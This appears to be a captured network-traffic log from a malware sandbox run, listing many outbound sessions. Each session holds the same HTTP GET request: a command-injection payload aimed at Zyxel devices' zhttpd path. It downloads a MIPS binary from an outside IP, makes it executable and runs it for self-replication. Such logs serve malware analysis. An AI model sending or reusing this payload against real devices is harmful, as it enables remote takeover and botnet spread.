                                                Jan 28, 2024 10:15:51.494544029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.234149449.102.46.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494556904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.2333846147.30.244.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494638920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.2345988203.218.230.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494682074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.2356216143.244.209.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494683027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.236068464.206.108.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494741917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.2343486157.229.234.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494770050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.2358550189.243.84.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494811058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.2346116152.211.230.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494859934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.2346486179.197.188.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494920015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.236020093.76.36.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494923115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.2350390221.135.44.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494956017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.2356774161.91.162.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495001078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.235404497.129.44.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495069027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.235903866.134.199.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495074987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.233284096.103.44.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495112896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.2347810144.7.180.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495170116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.236011069.145.91.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495199919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.234381493.41.165.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495264053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.2348276156.71.186.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495290995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.235895287.96.0.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495294094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.2343592133.3.44.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495323896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.2349714217.123.13.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495392084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.2357858177.60.51.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495409966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.2346672152.244.209.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495471001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.2341470192.219.43.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495518923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.2358470115.31.133.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495558977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.235613076.218.156.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495640039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.2343618152.158.37.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495675087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.235595457.178.189.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495740891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.234037413.44.77.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495754957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.235017296.41.213.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495779037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.2354828104.182.194.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495814085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.23473849.223.7.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495855093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.235004097.86.23.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495878935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.2341450160.190.8.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495975018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.2334668213.225.70.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.495990038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.2336910123.101.43.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496046066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.234399278.57.10.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496074915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.234110665.150.112.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496114016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.2342040102.253.88.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496148109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.2343768152.6.69.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496184111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.234846881.231.159.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496212006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.234322634.39.47.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496217966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.2339600198.108.50.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496256113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.234490077.40.230.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496303082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.234499092.6.133.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496330976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.2344884114.167.49.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496387959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.235224227.22.64.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496392012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.234074659.135.22.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496436119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.2338064201.159.123.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496464968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.2337640178.198.254.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496516943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.2349058190.83.8.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496553898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.2347374188.7.126.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496622086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.234730093.230.89.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496627092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.235016643.19.154.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496705055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.2333354164.225.105.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496725082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.2347298108.166.153.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496740103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.234396439.129.197.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496794939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.233600619.63.207.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496851921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.233303493.84.242.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496876001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.235494082.127.212.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496936083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.233559485.54.71.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.496962070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
